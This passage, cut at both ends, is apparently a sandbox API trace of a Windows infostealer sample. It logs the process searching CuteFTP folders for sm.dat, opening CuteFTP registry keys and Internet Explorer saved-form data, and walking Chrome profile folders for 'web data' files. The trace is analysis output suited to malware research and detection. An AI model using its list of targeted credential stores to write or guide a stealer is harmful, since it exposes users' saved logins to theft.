hTemplateFile=0x0) returned 0xffffffff [0591.027] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.027] lstrlenW (lpString="\\*.*") returned 4 [0591.027] lstrlenW (lpString="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP") returned 42 [0591.027] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0060 [0591.027] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP\\*.*", lpFindFileData=0x52e090 | out: lpFindFileData=0x52e090) returned 0xffffffff [0591.027] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.027] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.027] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP Pro") returned 24 [0591.027] lstrlenW (lpString="C:\\Program Files (x86)") returned 22 [0591.027] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0060 [0591.027] lstrlenW (lpString="\\sm.dat") returned 7 [0591.027] lstrlenW (lpString="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Pro") returned 46 [0591.027] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5e6f98 [0591.027] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x36 [0591.027] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x59f8b0 [0591.028] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", lpDst=0x59f8b0, nSize=0x36 | out: lpDst="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Pro\\sm.dat") returned 0x36 [0591.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Pro\\sm.dat" (normalized: "c:\\program files (x86)\\globalscape\\cuteftp pro\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.028] LocalFree (hMem=0x59f8b0) returned 0x0 [0591.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Pro\\sm.dat" (normalized: "c:\\program files (x86)\\globalscape\\cuteftp pro\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.028] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.028] lstrlenW (lpString="\\*.*") returned 4 [0591.028] lstrlenW (lpString="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Pro") returned 46 [0591.028] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ab0 [0591.028] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Pro\\*.*", lpFindFileData=0x52e090 | out: lpFindFileData=0x52e090) returned 0xffffffff [0591.028] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.028] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.028] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP Lite") returned 25 [0591.028] lstrlenW (lpString="C:\\Program Files (x86)") returned 22 [0591.028] LocalAlloc (uFlags=0x40, uBytes=0xe0) returned 0x2ed0060 [0591.028] lstrlenW (lpString="\\sm.dat") returned 7 [0591.028] lstrlenW (lpString="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Lite") returned 47 [0591.028] LocalAlloc (uFlags=0x40, uBytes=0xee) returned 0x5e6f98 [0591.028] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x37 [0591.028] LocalAlloc (uFlags=0x40, uBytes=0xee) returned 0x59f8b0 [0591.028] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", lpDst=0x59f8b0, nSize=0x37 | out: lpDst="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Lite\\sm.dat") returned 0x37 [0591.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Lite\\sm.dat" (normalized: "c:\\program files (x86)\\globalscape\\cuteftp lite\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.028] LocalFree (hMem=0x59f8b0) returned 0x0 [0591.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Lite\\sm.dat" (normalized: "c:\\program files (x86)\\globalscape\\cuteftp lite\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.028] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.028] lstrlenW (lpString="\\*.*") returned 4 [0591.028] lstrlenW (lpString="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Lite") returned 47 [0591.028] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ab0 [0591.028] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Lite\\*.*", lpFindFileData=0x52e090 | out: lpFindFileData=0x52e090) returned 0xffffffff [0591.028] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.028] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.028] lstrlenW (lpString="\\CuteFTP") returned 8 [0591.028] lstrlenW (lpString="C:\\Program Files (x86)") returned 22 [0591.028] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0x5b7378 [0591.028] lstrlenW (lpString="\\sm.dat") returned 7 [0591.028] lstrlenW (lpString="C:\\Program Files (x86)\\CuteFTP") returned 30 [0591.028] LocalAlloc (uFlags=0x40, uBytes=0xcc) returned 0x5977a0 [0591.028] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\CuteFTP\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x26 [0591.028] LocalAlloc (uFlags=0x40, uBytes=0xcc) returned 0x597878 [0591.028] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\CuteFTP\\sm.dat", lpDst=0x597878, nSize=0x26 | out: lpDst="C:\\Program Files (x86)\\CuteFTP\\sm.dat") returned 0x26 [0591.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\CuteFTP\\sm.dat" (normalized: "c:\\program files (x86)\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.029] LocalFree (hMem=0x597878) returned 0x0 [0591.029] CreateFileW (lpFileName="C:\\Program Files (x86)\\CuteFTP\\sm.dat" (normalized: "c:\\program files (x86)\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.029] LocalFree (hMem=0x5977a0) returned 0x0 [0591.029] lstrlenW (lpString="\\*.*") returned 4 [0591.029] lstrlenW (lpString="C:\\Program Files (x86)\\CuteFTP") returned 30 [0591.029] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0x5d5258 [0591.029] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\CuteFTP\\*.*", lpFindFileData=0x52e090 | out: lpFindFileData=0x52e090) returned 0xffffffff [0591.029] LocalFree (hMem=0x5d5258) returned 0x0 [0591.029] LocalFree (hMem=0x5b7378) returned 0x0 [0591.029] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2f0 | out: phkResult=0x52e2f0*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c4 | out: phkResult=0x52e2c4*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e298 | out: phkResult=0x52e298*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e8 | out: phkResult=0x52e2e8*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2bc | out: phkResult=0x52e2bc*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e290 | out: phkResult=0x52e290*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e0 | out: phkResult=0x52e2e0*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b4 | out: phkResult=0x52e2b4*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e288 | out: phkResult=0x52e288*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2d8 | out: phkResult=0x52e2d8*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2ac | out: phkResult=0x52e2ac*=0x0) returned 0x2 [0591.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e280 | out: phkResult=0x52e280*=0x0) returned 0x2 [0591.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e310 | out: phkResult=0x52e310*=0x0) returned 0x2 [0591.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2e4 | out: phkResult=0x52e2e4*=0x0) returned 0x2 [0591.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2b8 | out: phkResult=0x52e2b8*=0x0) returned 0x2 [0591.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e308 | out: phkResult=0x52e308*=0x0) returned 0x2 [0591.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2dc | out: phkResult=0x52e2dc*=0x0) returned 0x2 [0591.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2b0 | out: phkResult=0x52e2b0*=0x0) returned 0x2 [0591.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e300 | out: phkResult=0x52e300*=0x0) returned 0x2 [0591.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2d4 | out: phkResult=0x52e2d4*=0x0) returned 0x2 [0591.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2a8 | out: phkResult=0x52e2a8*=0x0) returned 0x2 [0591.030] OleUninitialize () [0591.031] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\FormData", phkResult=0x52e348 | out: phkResult=0x52e348*=0x0) returned 0x2 [0591.031] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.031] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0591.031] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0591.031] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0591.031] LocalAlloc (uFlags=0x40, uBytes=0xe0) returned 0x2ed0060 [0591.031] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.031] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Google\\Chrome") returned 47 [0591.031] lstrlenW (lpString="\\*.*") returned 4 [0591.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Google\\Chrome") returned 47 [0591.032] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ab0 [0591.032] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Google\\Chrome\\*.*", lpFindFileData=0x52e0b8 | out: lpFindFileData=0x52e0b8) returned 0xffffffff [0591.032] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.032] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.032] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.032] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0591.032] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0591.032] lstrlenW (lpString="C:\\ProgramData") returned 14 [0591.032] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0x5b7378 [0591.032] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.032] lstrlenW (lpString="C:\\ProgramData\\Google\\Chrome") returned 28 [0591.032] lstrlenW (lpString="\\*.*") returned 4 [0591.032] lstrlenW (lpString="C:\\ProgramData\\Google\\Chrome") returned 28 [0591.032] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0x5d5258 [0591.032] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Google\\Chrome\\*.*", lpFindFileData=0x52e0a4 | out: lpFindFileData=0x52e0a4) returned 0xffffffff [0591.032] LocalFree (hMem=0x5d5258) returned 0x0 [0591.032] LocalFree (hMem=0x5b7378) returned 0x0 [0591.032] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.032] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.032] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0591.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.032] LocalAlloc (uFlags=0x40, uBytes=0xdc) returned 0x2ed0060 [0591.032] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0591.032] lstrlenW (lpString="\\*.*") returned 4 [0591.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0591.032] LocalAlloc (uFlags=0x40, uBytes=0xe4) returned 0x2ed2ab0 [0591.032] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\*.*", lpFindFileData=0x52e090 | out: lpFindFileData=0x52e090) returned 0x57d1e0 [0591.032] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.032] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e090 | out: lpFindFileData=0x52e090) returned 1 [0591.032] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.032] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.032] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e090 | out: lpFindFileData=0x52e090) returned 1 [0591.032] lstrcmpiW (lpString1="User Data", lpString2=".") returned 1 [0591.032] lstrcmpiW (lpString1="User Data", lpString2="..") returned 1 [0591.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0591.032] lstrlenW (lpString="\\") returned 1 [0591.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0591.032] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0591.032] lstrlenW (lpString="User Data") returned 9 [0591.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\") returned 46 [0591.032] LocalAlloc (uFlags=0x40, uBytes=0xf0) returned 0x5e6f98 [0591.032] LocalFree (hMem=0x2ed0148) returned 0x0 [0591.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.032] lstrlenW (lpString="\\*.*") returned 4 [0591.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.033] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x5d7c90 [0591.033] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 0x57ca60 [0591.033] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.033] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.033] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.033] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.033] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.033] lstrcmpiW (lpString1="CertificateTransparency", lpString2=".") returned 1 [0591.033] lstrcmpiW (lpString1="CertificateTransparency", lpString2="..") returned 1 [0591.033] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.033] lstrlenW (lpString="\\") returned 1 [0591.033] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.033] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x574838 [0591.033] lstrlenW (lpString="CertificateTransparency") returned 23 [0591.033] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.033] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63d588 [0591.033] LocalFree (hMem=0x574838) returned 0x0 [0591.033] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 79 [0591.033] lstrlenW (lpString="\\*.*") returned 4 [0591.033] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 79 [0591.033] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bbf0 [0591.033] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.033] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.033] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.033] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.033] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.033] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.033] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.033] LocalFree (hMem=0x63bbf0) returned 0x0 [0591.033] LocalFree (hMem=0x63d588) returned 0x0 [0591.033] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.033] lstrcmpiW (lpString1="Crashpad", lpString2=".") returned 1 [0591.033] lstrcmpiW (lpString1="Crashpad", lpString2="..") returned 1 [0591.033] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.033] lstrlenW (lpString="\\") returned 1 [0591.033] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.033] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x574838 [0591.033] lstrlenW (lpString="Crashpad") returned 8 [0591.033] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.033] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed570 [0591.033] LocalFree (hMem=0x574838) returned 0x0 [0591.033] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0591.033] lstrlenW (lpString="\\*.*") returned 4 [0591.033] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0591.033] LocalAlloc (uFlags=0x40, uBytes=0x10a) returned 0x5ed688 [0591.034] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.034] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.034] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.034] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.034] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.034] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.034] lstrlenW (lpString="\\") returned 1 [0591.034] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0591.034] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed7a0 [0591.034] lstrlenW (lpString="metadata") returned 8 [0591.034] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 65 [0591.034] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x63d588 [0591.034] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.034] StrStrIW (lpFirst="metadata", lpSrch="web data") returned 0x0 [0591.034] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.034] lstrcmpiW (lpString1="reports", lpString2=".") returned 1 [0591.034] lstrcmpiW (lpString1="reports", lpString2="..") returned 1 [0591.034] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0591.034] lstrlenW (lpString="\\") returned 1 [0591.034] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0591.034] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed7a0 [0591.034] lstrlenW (lpString="reports") returned 7 [0591.034] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 65 [0591.034] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x63d6b0 [0591.034] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.034] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 72 [0591.034] lstrlenW (lpString="\\*.*") returned 4 [0591.034] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 72 [0591.034] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0591.034] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*.*", lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0x5b9b50 [0591.034] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.034] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.034] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.034] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.034] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0 [0591.034] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.034] LocalFree (hMem=0x63d7d8) returned 0x0 [0591.034] LocalFree (hMem=0x63d6b0) returned 0x0 [0591.034] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.034] lstrlenW (lpString="\\") returned 1 [0591.034] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0591.034] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed7a0 [0591.034] lstrlenW (lpString="settings.dat") returned 12 [0591.034] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 65 [0591.034] LocalAlloc (uFlags=0x40, uBytes=0x11c) returned 0x63d6b0 [0591.034] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.034] StrStrIW (lpFirst="settings.dat", lpSrch="web data") returned 0x0 [0591.034] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.035] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.035] LocalFree (hMem=0x5ed688) returned 0x0 [0591.035] LocalFree (hMem=0x5ed570) returned 0x0 [0591.035] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.035] lstrlenW (lpString="\\") returned 1 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.035] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x574838 [0591.035] lstrlenW (lpString="CrashpadMetrics-active.pma") returned 26 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.035] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63bbf0 [0591.035] LocalFree (hMem=0x574838) returned 0x0 [0591.035] StrStrIW (lpFirst="CrashpadMetrics-active.pma", lpSrch="web data") returned 0x0 [0591.035] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.035] lstrcmpiW (lpString1="Default", lpString2=".") returned 1 [0591.035] lstrcmpiW (lpString1="Default", lpString2="..") returned 1 [0591.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.035] lstrlenW (lpString="\\") returned 1 [0591.035] lstrlenW 